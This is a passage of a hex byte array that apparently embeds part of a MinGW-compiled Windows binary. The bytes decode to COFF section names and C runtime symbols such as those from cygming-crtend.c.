,0x61 ,0x24 ,0x36 ,0xa6 ,0x03 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x00 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x80 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xd8 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x90 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x8a ,0x03 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x08 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x7c ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xd0 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x88 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x7a ,0x03 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x10 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x78 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xc8 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x80 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x60 ,0x03 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x18 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x74 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xc0 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x78 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x50 ,0x03 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x20 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x70 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x70 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x3a ,0x03 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x28 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x6c ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xb0 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x68 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x24 ,0x03 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x30 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x68 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xa8 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x60 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0x10 ,0x03 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x38 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x64 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0xa0 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x58 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0xf8 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x40 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0x60 ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0x98 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x50 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x36 ,0xe0 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x66 ,0x69 ,0x6c ,0x65 ,0x00 ,0x00 ,0x00 ,0xe3 ,0x02 ,0x00 ,0x00 ,0xfe ,0xff ,0x00 ,0x00 ,0x67 ,0x01 ,0x66 ,0x61 ,0x6b ,0x65 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x68 ,0x6e ,0x61 ,0x6d ,0x65 ,0x00 ,0x00 ,0x00 ,0x50 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x66 ,0x74 ,0x68 ,0x75 ,0x6e ,0x6b ,0x00 ,0x00 ,0x98 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x50 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x32 ,0x00 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x14 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x50 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0x98 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x66 ,0x69 ,0x6c ,0x65 ,0x00 ,0x00 ,0x00 ,0xf1 ,0x02 ,0x00 ,0x00 ,0xfe ,0xff ,0x00 ,0x00 ,0x67 ,0x01 ,0x66 ,0x61 ,0x6b ,0x65 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x50 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x34 ,0x08 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x35 ,0x50 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x24 ,0x37 ,0xbc ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x0d ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x66 ,0x69 ,0x6c ,0x65 ,0x00 ,0x00 ,0x00 ,0x03 ,0x03 ,0x00 ,0x00 ,0xfe ,0xff ,0x00 ,0x00 ,0x67 ,0x01 ,0x63 ,0x79 ,0x67 ,0x6d ,0x69 ,0x6e ,0x67 ,0x2d ,0x63 ,0x72 ,0x74 ,0x65 ,0x6e ,0x64 ,0x2e ,0x63 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x04 ,0x07 ,0x00 ,0x00 ,0xc0 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x50 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x09 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x18 ,0x07 ,0x00 ,0x00 ,0xc0 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x05 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x26 ,0x07 ,0x00 ,0x00 ,0xa8 ,0x01 ,0x00 ,0x00 ,0x05 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x04 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x35 ,0x07 ,0x00 ,0x00 ,0x1c ,0x02 ,0x00 ,0x00 ,0x04 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x0c ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x44 ,0x07 ,0x00 ,0x00 ,0xd8 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x5f ,0x5f ,0x78 ,0x63 ,0x5f ,0x7a ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x09 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x51 ,0x07 ,0x00 ,0x00 ,0x20 ,0x03 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x70 ,0x07 ,0x00 ,0x00 ,0x80 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x7c ,0x07 ,0x00 ,0x00 ,0xbc ,0x05 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x98 ,0x07 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xa7 ,0x07 ,0x00 ,0x00 ,0xe8 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xb6 ,0x07 ,0x00 ,0x00 ,0x70 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xc2 ,0x07 ,0x00 ,0x00 ,0x08 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xd9 ,0x07 ,0x00 ,0x00 ,0xc8 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xf5 ,0x07 ,0x00 ,0x00 ,0x88 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x5f ,0x6c ,0x6f ,0x63 ,0x6b ,0x00 ,0x00 ,0x00 ,0x70 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x0a ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x11 ,0x08 ,0x00 ,0x00 ,0x80 ,0x02 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x30 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0xcc ,0x68 ,0xff ,0xff ,0x00 ,0x00 ,0x02 ,0x00 ,0x5f ,0x5f ,0x78 ,0x6c ,0x5f ,0x61 ,0x00 ,0x00 ,0x28 ,0x00 ,0x00 ,0x00 ,0x09 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x3c ,0x08 ,0x00 ,0x00 ,0x80 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x08 ,0x00 ,0x00 ,0x18 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x55 ,0x08 ,0x00 ,0x00 ,0xd0 ,0x02 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x67 ,0x08 ,0x00 ,0x00 ,0x10 ,0x1a ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x7f ,0x08 ,0x00 ,0x00 ,0xc0 ,0x05 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x96 ,0x08 ,0x00 ,0x00 ,0x20 ,0x03 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xaa ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xff ,0xff ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xc2 ,0x08 ,0x00 ,0x00 ,0x00 ,0x10 ,0x00 ,0x00 ,0xff ,0xff ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xdb ,0x08 ,0x00 ,0x00 ,0x78 ,0x19 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xe6 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0x00 ,0xff ,0xff ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x09 ,0x00 ,0x00 ,0x05 ,0x00 ,0x00 ,0x00 ,0xff ,0xff ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x1c ,0x09 ,0x00 ,0x00 ,0x28 ,0x00 ,0x00 ,0x00 ,0x09 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x09 ,0x00 ,0x00 ,0x98 ,0x01 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x5f ,0x5f ,0x78 ,0x6c ,0x5f ,0x64 ,0x00 ,0x00 ,0x38 ,0x00 ,0x00 ,0x00 ,0x09 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 